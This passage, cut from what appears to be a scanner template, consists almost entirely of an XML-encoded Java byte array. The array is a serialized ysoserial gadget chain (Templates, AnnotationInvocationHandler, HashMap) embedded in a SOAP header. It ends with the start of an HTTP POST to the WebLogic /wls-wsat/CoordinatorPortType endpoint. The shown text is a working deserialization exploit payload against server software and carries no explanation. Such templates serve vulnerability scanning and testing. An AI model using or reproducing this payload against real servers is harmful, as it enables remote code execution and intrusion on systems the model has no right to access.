index=\"4268\"><byte>84</byte></void><void index=\"4269\"><byte>97</byte></void><void index=\"4270\"><byte>98</byte></void><void index=\"4271\"><byte>108</byte></void><void index=\"4272\"><byte>101</byte></void><void index=\"4273\"><byte>1</byte></void><void index=\"4274\"><byte>0</byte></void><void index=\"4275\"><byte>4</byte></void><void index=\"4276\"><byte>116</byte></void><void index=\"4277\"><byte>104</byte></void><void index=\"4278\"><byte>105</byte></void><void index=\"4279\"><byte>115</byte></void><void index=\"4280\"><byte>1</byte></void><void index=\"4281\"><byte>0</byte></void><void index=\"4282\"><byte>3</byte></void><void index=\"4283\"><byte>70</byte></void><void index=\"4284\"><byte>111</byte></void><void index=\"4285\"><byte>111</byte></void><void index=\"4286\"><byte>1</byte></void><void index=\"4287\"><byte>0</byte></void><void index=\"4288\"><byte>12</byte></void><void index=\"4289\"><byte>73</byte></void><void index=\"4290\"><byte>110</byte></void><void index=\"4291\"><byte>110</byte></void><void index=\"4292\"><byte>101</byte></void><void index=\"4293\"><byte>114</byte></void><void index=\"4294\"><byte>67</byte></void><void index=\"4295\"><byte>108</byte></void><void index=\"4296\"><byte>97</byte></void><void index=\"4297\"><byte>115</byte></void><void index=\"4298\"><byte>115</byte></void><void index=\"4299\"><byte>101</byte></void><void index=\"4300\"><byte>115</byte></void><void index=\"4301\"><byte>1</byte></void><void index=\"4302\"><byte>0</byte></void><void index=\"4303\"><byte>37</byte></void><void index=\"4304\"><byte>76</byte></void><void index=\"4305\"><byte>121</byte></void><void index=\"4306\"><byte>115</byte></void><void index=\"4307\"><byte>111</byte></void><void index=\"4308\"><byte>115</byte></void><void index=\"4309\"><byte>101</byte></void><void index=\"4310\"><byte>114</byte></void><void index=\"4311\"><byte>105</byte></void><void index=\"4312\"><byte>97</byte></void><void index=\"4313\"><byte>108</byte></void><void index=\"4314\"><byte>47</byte></void><void index=\"4315\"><byte>112</byte></void><void index=\"4316\"><byte>97</byte></void><void index=\"4317\"><byte>121</byte></void><void index=\"4318\"><byte>108</byte></void><void index=\"4319\"><byte>111</byte></void><void index=\"4320\"><byte>97</byte></void><void index=\"4321\"><byte>100</byte></void><void index=\"4322\"><byte>115</byte></void><void index=\"4323\"><byte>47</byte></void><void index=\"4324\"><byte>117</byte></void><void index=\"4325\"><byte>116</byte></void><void index=\"4326\"><byte>105</byte></void><void index=\"4327\"><byte>108</byte></void><void index=\"4328\"><byte>47</byte></void><void index=\"4329\"><byte>71</byte></void><void index=\"4330\"><byte>97</byte></void><void index=\"4331\"><byte>100</byte></void><void index=\"4332\"><byte>103</byte></void><void index=\"4333\"><byte>101</byte></void><void index=\"4334\"><byte>116</byte></void><void index=\"4335\"><byte>115</byte></void><void index=\"4336\"><byte>36</byte></void><void index=\"4337\"><byte>70</byte></void><void index=\"4338\"><byte>111</byte></void><void index=\"4339\"><byte>111</byte></void><void index=\"4340\"><byte>59</byte></void><void index=\"4341\"><byte>1</byte></void><void index=\"4342\"><byte>0</byte></void><void index=\"4343\"><byte>10</byte></void><void index=\"4344\"><byte>83</byte></void><void index=\"4345\"><byte>111</byte></void><void index=\"4346\"><byte>117</byte></void><void index=\"4347\"><byte>114</byte></void><void index=\"4348\"><byte>99</byte></void><void index=\"4349\"><byte>101</byte></void><void index=\"4350\"><byte>70</byte></void><void index=\"4351\"><byte>105</byte></void><void index=\"4352\"><byte>108</byte></void><void index=\"4353\"><byte>101</byte></void><void index=\"4354\"><byte>1</byte></void><void index=\"4355\"><byte>0</byte></void><void index=\"4356\"><byte>12</byte></void><void index=\"4357\"><byte>71</byte></void><void index=\"4358\"><byte>97</byte></void><void index=\"4359\"><byte>100</byte></void><void index=\"4360\"><byte>103</byte></void><void index=\"4361\"><byte>101</byte></void><void index=\"4362\"><byte>116</byte></void><void index=\"4363\"><byte>115</byte></void><void index=\"4364\"><byte>46</byte></void><void index=\"4365\"><byte>106</byte></void><void index=\"4366\"><byte>97</byte></void><void index=\"4367\"><byte>118</byte></void><void index=\"4368\"><byte>97</byte></void><void index=\"4369\"><byte>12</byte></void><void index=\"4370\"><byte>0</byte></void><void index=\"4371\"><byte>10</byte></void><void index=\"4372\"><byte>0</byte></void><void index=\"4373\"><byte>11</byte></void><void index=\"4374\"><byte>7</byte></void><void index=\"4375\"><byte>0</byte></void><void index=\"4376\"><byte>26</byte></void><void index=\"4377\"><byte>1</byte></void><void index=\"4378\"><byte>0</byte></void><void index=\"4379\"><byte>35</byte></void><void index=\"4380\"><byte>121</byte></void><void index=\"4381\"><byte>115</byte></void><void index=\"4382\"><byte>111</byte></void><void index=\"4383\"><byte>115</byte></void><void index=\"4384\"><byte>101</byte></void><void index=\"4385\"><byte>114</byte></void><void index=\"4386\"><byte>105</byte></void><void index=\"4387\"><byte>97</byte></void><void index=\"4388\"><byte>108</byte></void><void index=\"4389\"><byte>47</byte></void><void index=\"4390\"><byte>112</byte></void><void index=\"4391\"><byte>97</byte></void><void index=\"4392\"><byte>121</byte></void><void index=\"4393\"><byte>108</byte></void><void index=\"4394\"><byte>111</byte></void><void index=\"4395\"><byte>97</byte></void><void index=\"4396\"><byte>100</byte></void><void index=\"4397\"><byte>115</byte></void><void index=\"4398\"><byte>47</byte></void><void index=\"4399\"><byte>117</byte></void><void index=\"4400\"><byte>116</byte></void><void index=\"4401\"><byte>105</byte></void><void index=\"4402\"><byte>108</byte></void><void index=\"4403\"><byte>47</byte></void><void index=\"4404\"><byte>71</byte></void><void index=\"4405\"><byte>97</byte></void><void index=\"4406\"><byte>100</byte></void><void index=\"4407\"><byte>103</byte></void><void index=\"4408\"><byte>101</byte></void><void index=\"4409\"><byte>116</byte></void><void index=\"4410\"><byte>115</byte></void><void index=\"4411\"><byte>36</byte></void><void index=\"4412\"><byte>70</byte></void><void index=\"4413\"><byte>111</byte></void><void index=\"4414\"><byte>111</byte></void><void index=\"4415\"><byte>1</byte></void><void index=\"4416\"><byte>0</byte></void><void index=\"4417\"><byte>16</byte></void><void index=\"4418\"><byte>106</byte></void><void index=\"4419\"><byte>97</byte></void><void index=\"4420\"><byte>118</byte></void><void index=\"4421\"><byte>97</byte></void><void index=\"4422\"><byte>47</byte></void><void index=\"4423\"><byte>108</byte></void><void index=\"4424\"><byte>97</byte></void><void index=\"4425\"><byte>110</byte></void><void index=\"4426\"><byte>103</byte></void><void index=\"4427\"><byte>47</byte></void><void index=\"4428\"><byte>79</byte></void><void index=\"4429\"><byte>98</byte></void><void index=\"4430\"><byte>106</byte></void><void index=\"4431\"><byte>101</byte></void><void index=\"4432\"><byte>99</byte></void><void index=\"4433\"><byte>116</byte></void><void index=\"4434\"><byte>1</byte></void><void index=\"4435\"><byte>0</byte></void><void index=\"4436\"><byte>20</byte></void><void index=\"4437\"><byte>106</byte></void><void index=\"4438\"><byte>97</byte></void><void index=\"4439\"><byte>118</byte></void><void index=\"4440\"><byte>97</byte></void><void index=\"4441\"><byte>47</byte></void><void index=\"4442\"><byte>105</byte></void><void index=\"4443\"><byte>111</byte></void><void index=\"4444\"><byte>47</byte></void><void index=\"4445\"><byte>83</byte></void><void index=\"4446\"><byte>101</byte></void><void index=\"4447\"><byte>114</byte></void><void index=\"4448\"><byte>105</byte></void><void index=\"4449\"><byte>97</byte></void><void index=\"4450\"><byte>108</byte></void><void index=\"4451\"><byte>105</byte></void><void index=\"4452\"><byte>122</byte></void><void index=\"4453\"><byte>97</byte></void><void index=\"4454\"><byte>98</byte></void><void index=\"4455\"><byte>108</byte></void><void index=\"4456\"><byte>101</byte></void><void index=\"4457\"><byte>1</byte></void><void index=\"4458\"><byte>0</byte></void><void index=\"4459\"><byte>31</byte></void><void index=\"4460\"><byte>121</byte></void><void index=\"4461\"><byte>115</byte></void><void index=\"4462\"><byte>111</byte></void><void index=\"4463\"><byte>115</byte></void><void index=\"4464\"><byte>101</byte></void><void index=\"4465\"><byte>114</byte></void><void index=\"4466\"><byte>105</byte></void><void index=\"4467\"><byte>97</byte></void><void index=\"4468\"><byte>108</byte></void><void index=\"4469\"><byte>47</byte></void><void index=\"4470\"><byte>112</byte></void><void index=\"4471\"><byte>97</byte></void><void index=\"4472\"><byte>121</byte></void><void index=\"4473\"><byte>108</byte></void><void index=\"4474\"><byte>111</byte></void><void index=\"4475\"><byte>97</byte></void><void index=\"4476\"><byte>100</byte></void><void index=\"4477\"><byte>115</byte></void><void index=\"4478\"><byte>47</byte></void><void index=\"4479\"><byte>117</byte></void><void index=\"4480\"><byte>116</byte></void><void index=\"4481\"><byte>105</byte></void><void index=\"4482\"><byte>108</byte></void><void index=\"4483\"><byte>47</byte></void><void index=\"4484\"><byte>71</byte></void><void index=\"4485\"><byte>97</byte></void><void index=\"4486\"><byte>100</byte></void><void index=\"4487\"><byte>103</byte></void><void index=\"4488\"><byte>101</byte></void><void index=\"4489\"><byte>116</byte></void><void index=\"4490\"><byte>115</byte></void><void index=\"4491\"><byte>0</byte></void><void index=\"4492\"><byte>33</byte></void><void index=\"4493\"><byte>0</byte></void><void index=\"4494\"><byte>2</byte></void><void index=\"4495\"><byte>0</byte></void><void index=\"4496\"><byte>3</byte></void><void index=\"4497\"><byte>0</byte></void><void index=\"4498\"><byte>1</byte></void><void index=\"4499\"><byte>0</byte></void><void index=\"4500\"><byte>4</byte></void><void index=\"4501\"><byte>0</byte></void><void index=\"4502\"><byte>1</byte></void><void index=\"4503\"><byte>0</byte></void><void index=\"4504\"><byte>26</byte></void><void index=\"4505\"><byte>0</byte></void><void index=\"4506\"><byte>5</byte></void><void index=\"4507\"><byte>0</byte></void><void index=\"4508\"><byte>6</byte></void><void index=\"4509\"><byte>0</byte></void><void index=\"4510\"><byte>1</byte></void><void index=\"4511\"><byte>0</byte></void><void index=\"4512\"><byte>7</byte></void><void index=\"4513\"><byte>0</byte></void><void index=\"4514\"><byte>0</byte></void><void index=\"4515\"><byte>0</byte></void><void index=\"4516\"><byte>2</byte></void><void index=\"4517\"><byte>0</byte></void><void index=\"4518\"><byte>8</byte></void><void index=\"4519\"><byte>0</byte></void><void index=\"4520\"><byte>1</byte></void><void index=\"4521\"><byte>0</byte></void><void index=\"4522\"><byte>1</byte></void><void index=\"4523\"><byte>0</byte></void><void index=\"4524\"><byte>10</byte></void><void index=\"4525\"><byte>0</byte></void><void index=\"4526\"><byte>11</byte></void><void index=\"4527\"><byte>0</byte></void><void index=\"4528\"><byte>1</byte></void><void index=\"4529\"><byte>0</byte></void><void index=\"4530\"><byte>12</byte></void><void index=\"4531\"><byte>0</byte></void><void index=\"4532\"><byte>0</byte></void><void index=\"4533\"><byte>0</byte></void><void index=\"4534\"><byte>47</byte></void><void index=\"4535\"><byte>0</byte></void><void index=\"4536\"><byte>1</byte></void><void index=\"4537\"><byte>0</byte></void><void index=\"4538\"><byte>1</byte></void><void index=\"4539\"><byte>0</byte></void><void index=\"4540\"><byte>0</byte></void><void index=\"4541\"><byte>0</byte></void><void index=\"4542\"><byte>5</byte></void><void index=\"4543\"><byte>42</byte></void><void index=\"4544\"><byte>-73</byte></void><void index=\"4545\"><byte>0</byte></void><void index=\"4546\"><byte>1</byte></void><void index=\"4547\"><byte>-79</byte></void><void index=\"4548\"><byte>0</byte></void><void index=\"4549\"><byte>0</byte></void><void index=\"4550\"><byte>0</byte></void><void index=\"4551\"><byte>2</byte></void><void index=\"4552\"><byte>0</byte></void><void index=\"4553\"><byte>13</byte></void><void index=\"4554\"><byte>0</byte></void><void index=\"4555\"><byte>0</byte></void><void index=\"4556\"><byte>0</byte></void><void index=\"4557\"><byte>6</byte></void><void index=\"4558\"><byte>0</byte></void><void index=\"4559\"><byte>1</byte></void><void index=\"4560\"><byte>0</byte></void><void index=\"4561\"><byte>0</byte></void><void index=\"4562\"><byte>0</byte></void><void index=\"4563\"><byte>60</byte></void><void index=\"4564\"><byte>0</byte></void><void index=\"4565\"><byte>14</byte></void><void index=\"4566\"><byte>0</byte></void><void index=\"4567\"><byte>0</byte></void><void index=\"4568\"><byte>0</byte></void><void index=\"4569\"><byte>12</byte></void><void index=\"4570\"><byte>0</byte></void><void index=\"4571\"><byte>1</byte></void><void index=\"4572\"><byte>0</byte></void><void index=\"4573\"><byte>0</byte></void><void index=\"4574\"><byte>0</byte></void><void index=\"4575\"><byte>5</byte></void><void index=\"4576\"><byte>0</byte></void><void index=\"4577\"><byte>15</byte></void><void index=\"4578\"><byte>0</byte></void><void index=\"4579\"><byte>18</byte></void><void index=\"4580\"><byte>0</byte></void><void index=\"4581\"><byte>0</byte></void><void index=\"4582\"><byte>0</byte></void><void index=\"4583\"><byte>2</byte></void><void index=\"4584\"><byte>0</byte></void><void index=\"4585\"><byte>19</byte></void><void index=\"4586\"><byte>0</byte></void><void index=\"4587\"><byte>0</byte></void><void index=\"4588\"><byte>0</byte></void><void index=\"4589\"><byte>2</byte></void><void index=\"4590\"><byte>0</byte></void><void index=\"4591\"><byte>20</byte></void><void index=\"4592\"><byte>0</byte></void><void index=\"4593\"><byte>17</byte></void><void index=\"4594\"><byte>0</byte></void><void index=\"4595\"><byte>0</byte></void><void index=\"4596\"><byte>0</byte></void><void index=\"4597\"><byte>10</byte></void><void index=\"4598\"><byte>0</byte></void><void index=\"4599\"><byte>1</byte></void><void index=\"4600\"><byte>0</byte></void><void index=\"4601\"><byte>2</byte></void><void index=\"4602\"><byte>0</byte></void><void index=\"4603\"><byte>22</byte></void><void index=\"4604\"><byte>0</byte></void><void index=\"4605\"><byte>16</byte></void><void index=\"4606\"><byte>0</byte></void><void index=\"4607\"><byte>9</byte></void><void index=\"4608\"><byte>112</byte></void><void index=\"4609\"><byte>116</byte></void><void index=\"4610\"><byte>0</byte></void><void index=\"4611\"><byte>4</byte></void><void index=\"4612\"><byte>80</byte></void><void index=\"4613\"><byte>119</byte></void><void index=\"4614\"><byte>110</byte></void><void index=\"4615\"><byte>114</byte></void><void index=\"4616\"><byte>112</byte></void><void index=\"4617\"><byte>119</byte></void><void index=\"4618\"><byte>1</byte></void><void index=\"4619\"><byte>0</byte></void><void index=\"4620\"><byte>120</byte></void><void index=\"4621\"><byte>115</byte></void><void index=\"4622\"><byte>125</byte></void><void index=\"4623\"><byte>0</byte></void><void index=\"4624\"><byte>0</byte></void><void index=\"4625\"><byte>0</byte></void><void index=\"4626\"><byte>1</byte></void><void index=\"4627\"><byte>0</byte></void><void index=\"4628\"><byte>29</byte></void><void index=\"4629\"><byte>106</byte></void><void index=\"4630\"><byte>97</byte></void><void index=\"4631\"><byte>118</byte></void><void index=\"4632\"><byte>97</byte></void><void index=\"4633\"><byte>120</byte></void><void index=\"4634\"><byte>46</byte></void><void index=\"4635\"><byte>120</byte></void><void index=\"4636\"><byte>109</byte></void><void index=\"4637\"><byte>108</byte></void><void index=\"4638\"><byte>46</byte></void><void index=\"4639\"><byte>116</byte></void><void index=\"4640\"><byte>114</byte></void><void index=\"4641\"><byte>97</byte></void><void index=\"4642\"><byte>110</byte></void><void index=\"4643\"><byte>115</byte></void><void index=\"4644\"><byte>102</byte></void><void index=\"4645\"><byte>111</byte></void><void index=\"4646\"><byte>114</byte></void><void index=\"4647\"><byte>109</byte></void><void index=\"4648\"><byte>46</byte></void><void index=\"4649\"><byte>84</byte></void><void index=\"4650\"><byte>101</byte></void><void index=\"4651\"><byte>109</byte></void><void index=\"4652\"><byte>112</byte></void><void index=\"4653\"><byte>108</byte></void><void index=\"4654\"><byte>97</byte></void><void index=\"4655\"><byte>116</byte></void><void index=\"4656\"><byte>101</byte></void><void index=\"4657\"><byte>115</byte></void><void index=\"4658\"><byte>120</byte></void><void index=\"4659\"><byte>114</byte></void><void index=\"4660\"><byte>0</byte></void><void index=\"4661\"><byte>23</byte></void><void index=\"4662\"><byte>106</byte></void><void index=\"4663\"><byte>97</byte></void><void index=\"4664\"><byte>118</byte></void><void index=\"4665\"><byte>97</byte></void><void index=\"4666\"><byte>46</byte></void><void index=\"4667\"><byte>108</byte></void><void index=\"4668\"><byte>97</byte></void><void index=\"4669\"><byte>110</byte></void><void index=\"4670\"><byte>103</byte></void><void index=\"4671\"><byte>46</byte></void><void index=\"4672\"><byte>114</byte></void><void index=\"4673\"><byte>101</byte></void><void index=\"4674\"><byte>102</byte></void><void index=\"4675\"><byte>108</byte></void><void index=\"4676\"><byte>101</byte></void><void index=\"4677\"><byte>99</byte></void><void index=\"4678\"><byte>116</byte></void><void index=\"4679\"><byte>46</byte></void><void index=\"4680\"><byte>80</byte></void><void index=\"4681\"><byte>114</byte></void><void index=\"4682\"><byte>111</byte></void><void index=\"4683\"><byte>120</byte></void><void index=\"4684\"><byte>121</byte></void><void index=\"4685\"><byte>-31</byte></void><void index=\"4686\"><byte>39</byte></void><void index=\"4687\"><byte>-38</byte></void><void index=\"4688\"><byte>32</byte></void><void index=\"4689\"><byte>-52</byte></void><void index=\"4690\"><byte>16</byte></void><void index=\"4691\"><byte>67</byte></void><void index=\"4692\"><byte>-53</byte></void><void index=\"4693\"><byte>2</byte></void><void index=\"4694\"><byte>0</byte></void><void index=\"4695\"><byte>1</byte></void><void index=\"4696\"><byte>76</byte></void><void index=\"4697\"><byte>0</byte></void><void index=\"4698\"><byte>1</byte></void><void index=\"4699\"><byte>104</byte></void><void index=\"4700\"><byte>116</byte></void><void index=\"4701\"><byte>0</byte></void><void index=\"4702\"><byte>37</byte></void><void index=\"4703\"><byte>76</byte></void><void index=\"4704\"><byte>106</byte></void><void index=\"4705\"><byte>97</byte></void><void index=\"4706\"><byte>118</byte></void><void index=\"4707\"><byte>97</byte></void><void index=\"4708\"><byte>47</byte></void><void index=\"4709\"><byte>108</byte></void><void index=\"4710\"><byte>97</byte></void><void index=\"4711\"><byte>110</byte></void><void index=\"4712\"><byte>103</byte></void><void index=\"4713\"><byte>47</byte></void><void index=\"4714\"><byte>114</byte></void><void index=\"4715\"><byte>101</byte></void><void index=\"4716\"><byte>102</byte></void><void index=\"4717\"><byte>108</byte></void><void index=\"4718\"><byte>101</byte></void><void index=\"4719\"><byte>99</byte></void><void index=\"4720\"><byte>116</byte></void><void index=\"4721\"><byte>47</byte></void><void index=\"4722\"><byte>73</byte></void><void index=\"4723\"><byte>110</byte></void><void index=\"4724\"><byte>118</byte></void><void index=\"4725\"><byte>111</byte></void><void index=\"4726\"><byte>99</byte></void><void index=\"4727\"><byte>97</byte></void><void index=\"4728\"><byte>116</byte></void><void index=\"4729\"><byte>105</byte></void><void index=\"4730\"><byte>111</byte></void><void index=\"4731\"><byte>110</byte></void><void index=\"4732\"><byte>72</byte></void><void index=\"4733\"><byte>97</byte></void><void index=\"4734\"><byte>110</byte></void><void index=\"4735\"><byte>100</byte></void><void index=\"4736\"><byte>108</byte></void><void index=\"4737\"><byte>101</byte></void><void index=\"4738\"><byte>114</byte></void><void index=\"4739\"><byte>59</byte></void><void index=\"4740\"><byte>120</byte></void><void index=\"4741\"><byte>112</byte></void><void index=\"4742\"><byte>115</byte></void><void index=\"4743\"><byte>114</byte></void><void index=\"4744\"><byte>0</byte></void><void index=\"4745\"><byte>50</byte></void><void index=\"4746\"><byte>115</byte></void><void index=\"4747\"><byte>117</byte></void><void index=\"4748\"><byte>110</byte></void><void index=\"4749\"><byte>46</byte></void><void index=\"4750\"><byte>114</byte></void><void index=\"4751\"><byte>101</byte></void><void index=\"4752\"><byte>102</byte></void><void index=\"4753\"><byte>108</byte></void><void index=\"4754\"><byte>101</byte></void><void index=\"4755\"><byte>99</byte></void><void index=\"4756\"><byte>116</byte></void><void index=\"4757\"><byte>46</byte></void><void index=\"4758\"><byte>97</byte></void><void index=\"4759\"><byte>110</byte></void><void index=\"4760\"><byte>110</byte></void><void index=\"4761\"><byte>111</byte></void><void index=\"4762\"><byte>116</byte></void><void index=\"4763\"><byte>97</byte></void><void index=\"4764\"><byte>116</byte></void><void index=\"4765\"><byte>105</byte></void><void index=\"4766\"><byte>111</byte></void><void index=\"4767\"><byte>110</byte></void><void index=\"4768\"><byte>46</byte></void><void index=\"4769\"><byte>65</byte></void><void index=\"4770\"><byte>110</byte></void><void index=\"4771\"><byte>110</byte></void><void index=\"4772\"><byte>111</byte></void><void index=\"4773\"><byte>116</byte></void><void index=\"4774\"><byte>97</byte></void><void index=\"4775\"><byte>116</byte></void><void index=\"4776\"><byte>105</byte></void><void index=\"4777\"><byte>111</byte></void><void index=\"4778\"><byte>110</byte></void><void index=\"4779\"><byte>73</byte></void><void index=\"4780\"><byte>110</byte></void><void index=\"4781\"><byte>118</byte></void><void index=\"4782\"><byte>111</byte></void><void index=\"4783\"><byte>99</byte></void><void index=\"4784\"><byte>97</byte></void><void index=\"4785\"><byte>116</byte></void><void index=\"4786\"><byte>105</byte></void><void index=\"4787\"><byte>111</byte></void><void index=\"4788\"><byte>110</byte></void><void index=\"4789\"><byte>72</byte></void><void index=\"4790\"><byte>97</byte></void><void index=\"4791\"><byte>110</byte></void><void index=\"4792\"><byte>100</byte></void><void index=\"4793\"><byte>108</byte></void><void index=\"4794\"><byte>101</byte></void><void index=\"4795\"><byte>114</byte></void><void index=\"4796\"><byte>85</byte></void><void index=\"4797\"><byte>-54</byte></void><void index=\"4798\"><byte>-11</byte></void><void index=\"4799\"><byte>15</byte></void><void index=\"4800\"><byte>21</byte></void><void index=\"4801\"><byte>-53</byte></void><void index=\"4802\"><byte>126</byte></void><void index=\"4803\"><byte>-91</byte></void><void index=\"4804\"><byte>2</byte></void><void index=\"4805\"><byte>0</byte></void><void index=\"4806\"><byte>2</byte></void><void index=\"4807\"><byte>76</byte></void><void index=\"4808\"><byte>0</byte></void><void index=\"4809\"><byte>12</byte></void><void index=\"4810\"><byte>109</byte></void><void index=\"4811\"><byte>101</byte></void><void index=\"4812\"><byte>109</byte></void><void index=\"4813\"><byte>98</byte></void><void index=\"4814\"><byte>101</byte></void><void index=\"4815\"><byte>114</byte></void><void index=\"4816\"><byte>86</byte></void><void index=\"4817\"><byte>97</byte></void><void index=\"4818\"><byte>108</byte></void><void index=\"4819\"><byte>117</byte></void><void index=\"4820\"><byte>101</byte></void><void index=\"4821\"><byte>115</byte></void><void index=\"4822\"><byte>116</byte></void><void index=\"4823\"><byte>0</byte></void><void index=\"4824\"><byte>15</byte></void><void index=\"4825\"><byte>76</byte></void><void index=\"4826\"><byte>106</byte></void><void index=\"4827\"><byte>97</byte></void><void index=\"4828\"><byte>118</byte></void><void index=\"4829\"><byte>97</byte></void><void index=\"4830\"><byte>47</byte></void><void index=\"4831\"><byte>117</byte></void><void index=\"4832\"><byte>116</byte></void><void index=\"4833\"><byte>105</byte></void><void index=\"4834\"><byte>108</byte></void><void index=\"4835\"><byte>47</byte></void><void index=\"4836\"><byte>77</byte></void><void index=\"4837\"><byte>97</byte></void><void index=\"4838\"><byte>112</byte></void><void index=\"4839\"><byte>59</byte></void><void index=\"4840\"><byte>76</byte></void><void index=\"4841\"><byte>0</byte></void><void index=\"4842\"><byte>4</byte></void><void index=\"4843\"><byte>116</byte></void><void index=\"4844\"><byte>121</byte></void><void index=\"4845\"><byte>112</byte></void><void index=\"4846\"><byte>101</byte></void><void index=\"4847\"><byte>116</byte></void><void index=\"4848\"><byte>0</byte></void><void index=\"4849\"><byte>17</byte></void><void index=\"4850\"><byte>76</byte></void><void index=\"4851\"><byte>106</byte></void><void index=\"4852\"><byte>97</byte></void><void index=\"4853\"><byte>118</byte></void><void index=\"4854\"><byte>97</byte></void><void index=\"4855\"><byte>47</byte></void><void index=\"4856\"><byte>108</byte></void><void index=\"4857\"><byte>97</byte></void><void index=\"4858\"><byte>110</byte></void><void index=\"4859\"><byte>103</byte></void><void index=\"4860\"><byte>47</byte></void><void index=\"4861\"><byte>67</byte></void><void index=\"4862\"><byte>108</byte></void><void index=\"4863\"><byte>97</byte></void><void index=\"4864\"><byte>115</byte></void><void index=\"4865\"><byte>115</byte></void><void index=\"4866\"><byte>59</byte></void><void index=\"4867\"><byte>120</byte></void><void index=\"4868\"><byte>112</byte></void><void index=\"4869\"><byte>115</byte></void><void index=\"4870\"><byte>114</byte></void><void index=\"4871\"><byte>0</byte></void><void index=\"4872\"><byte>17</byte></void><void index=\"4873\"><byte>106</byte></void><void index=\"4874\"><byte>97</byte></void><void index=\"4875\"><byte>118</byte></void><void index=\"4876\"><byte>97</byte></void><void index=\"4877\"><byte>46</byte></void><void index=\"4878\"><byte>117</byte></void><void index=\"4879\"><byte>116</byte></void><void index=\"4880\"><byte>105</byte></void><void index=\"4881\"><byte>108</byte></void><void index=\"4882\"><byte>46</byte></void><void index=\"4883\"><byte>72</byte></void><void index=\"4884\"><byte>97</byte></void><void index=\"4885\"><byte>115</byte></void><void index=\"4886\"><byte>104</byte></void><void index=\"4887\"><byte>77</byte></void><void index=\"4888\"><byte>97</byte></void><void index=\"4889\"><byte>112</byte></void><void index=\"4890\"><byte>5</byte></void><void index=\"4891\"><byte>7</byte></void><void index=\"4892\"><byte>-38</byte></void><void index=\"4893\"><byte>-63</byte></void><void index=\"4894\"><byte>-61</byte></void><void index=\"4895\"><byte>22</byte></void><void index=\"4896\"><byte>96</byte></void><void index=\"4897\"><byte>-47</byte></void><void index=\"4898\"><byte>3</byte></void><void index=\"4899\"><byte>0</byte></void><void index=\"4900\"><byte>2</byte></void><void index=\"4901\"><byte>70</byte></void><void index=\"4902\"><byte>0</byte></void><void index=\"4903\"><byte>10</byte></void><void index=\"4904\"><byte>108</byte></void><void index=\"4905\"><byte>111</byte></void><void index=\"4906\"><byte>97</byte></void><void index=\"4907\"><byte>100</byte></void><void index=\"4908\"><byte>70</byte></void><void index=\"4909\"><byte>97</byte></void><void index=\"4910\"><byte>99</byte></void><void index=\"4911\"><byte>116</byte></void><void index=\"4912\"><byte>111</byte></void><void index=\"4913\"><byte>114</byte></void><void index=\"4914\"><byte>73</byte></void><void index=\"4915\"><byte>0</byte></void><void index=\"4916\"><byte>9</byte></void><void index=\"4917\"><byte>116</byte></void><void index=\"4918\"><byte>104</byte></void><void index=\"4919\"><byte>114</byte></void><void index=\"4920\"><byte>101</byte></void><void index=\"4921\"><byte>115</byte></void><void index=\"4922\"><byte>104</byte></void><void index=\"4923\"><byte>111</byte></void><void index=\"4924\"><byte>108</byte></void><void index=\"4925\"><byte>100</byte></void><void index=\"4926\"><byte>120</byte></void><void index=\"4927\"><byte>112</byte></void><void index=\"4928\"><byte>63</byte></void><void index=\"4929\"><byte>64</byte></void><void index=\"4930\"><byte>0</byte></void><void index=\"4931\"><byte>0</byte></void><void index=\"4932\"><byte>0</byte></void><void index=\"4933\"><byte>0</byte></void><void index=\"4934\"><byte>0</byte></void><void index=\"4935\"><byte>12</byte></void><void index=\"4936\"><byte>119</byte></void><void index=\"4937\"><byte>8</byte></void><void index=\"4938\"><byte>0</byte></void><void index=\"4939\"><byte>0</byte></void><void index=\"4940\"><byte>0</byte></void><void index=\"4941\"><byte>16</byte></void><void index=\"4942\"><byte>0</byte></void><void index=\"4943\"><byte>0</byte></void><void index=\"4944\"><byte>0</byte></void><void index=\"4945\"><byte>1</byte></void><void index=\"4946\"><byte>116</byte></void><void index=\"4947\"><byte>0</byte></void><void index=\"4948\"><byte>8</byte></void><void index=\"4949\"><byte>102</byte></void><void index=\"4950\"><byte>53</byte></void><void index=\"4951\"><byte>97</byte></void><void index=\"4952\"><byte>53</byte></void><void index=\"4953\"><byte>97</byte></void><void index=\"4954\"><byte>54</byte></void><void index=\"4955\"><byte>48</byte></void><void index=\"4956\"><byte>56</byte></void><void index=\"4957\"><byte>113</byte></void><void index=\"4958\"><byte>0</byte></void><void index=\"4959\"><byte>126</byte></void><void index=\"4960\"><byte>0</byte></void><void index=\"4961\"><byte>9</byte></void><void index=\"4962\"><byte>120</byte></void><void index=\"4963\"><byte>118</byte></void><void index=\"4964\"><byte>114</byte></void><void index=\"4965\"><byte>0</byte></void><void index=\"4966\"><byte>29</byte></void><void index=\"4967\"><byte>106</byte></void><void index=\"4968\"><byte>97</byte></void><void index=\"4969\"><byte>118</byte></void><void index=\"4970\"><byte>97</byte></void><void index=\"4971\"><byte>120</byte></void><void index=\"4972\"><byte>46</byte></void><void index=\"4973\"><byte>120</byte></void><void index=\"4974\"><byte>109</byte></void><void index=\"4975\"><byte>108</byte></void><void index=\"4976\"><byte>46</byte></void><void index=\"4977\"><byte>116</byte></void><void index=\"4978\"><byte>114</byte></void><void index=\"4979\"><byte>97</byte></void><void index=\"4980\"><byte>110</byte></void><void index=\"4981\"><byte>115</byte></void><void index=\"4982\"><byte>102</byte></void><void index=\"4983\"><byte>111</byte></void><void index=\"4984\"><byte>114</byte></void><void index=\"4985\"><byte>109</byte></void><void index=\"4986\"><byte>46</byte></void><void index=\"4987\"><byte>84</byte></void><void index=\"4988\"><byte>101</byte></void><void index=\"4989\"><byte>109</byte></void><void index=\"4990\"><byte>112</byte></void><void index=\"4991\"><byte>108</byte></void><void index=\"4992\"><byte>97</byte></void><void index=\"4993\"><byte>116</byte></void><void index=\"4994\"><byte>101</byte></void><void index=\"4995\"><byte>115</byte></void><void index=\"4996\"><byte>0</byte></void><void index=\"4997\"><byte>0</byte></void><void index=\"4998\"><byte>0</byte></void><void index=\"4999\"><byte>0</byte></void><void index=\"5000\"><byte>0</byte></void><void index=\"5001\"><byte>0</byte></void><void index=\"5002\"><byte>0</byte></void><void index=\"5003\"><byte>0</byte></void><void index=\"5004\"><byte>0</byte></void><void index=\"5005\"><byte>0</byte></void><void index=\"5006\"><byte>0</byte></void><void index=\"5007\"><byte>120</byte></void><void index=\"5008\"><byte>112</byte></void><void index=\"5009\"><byte>120</byte></void></array></void></class></work:WorkContext></soapenv:Header><soapenv:Body></soapenv:Body></soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: 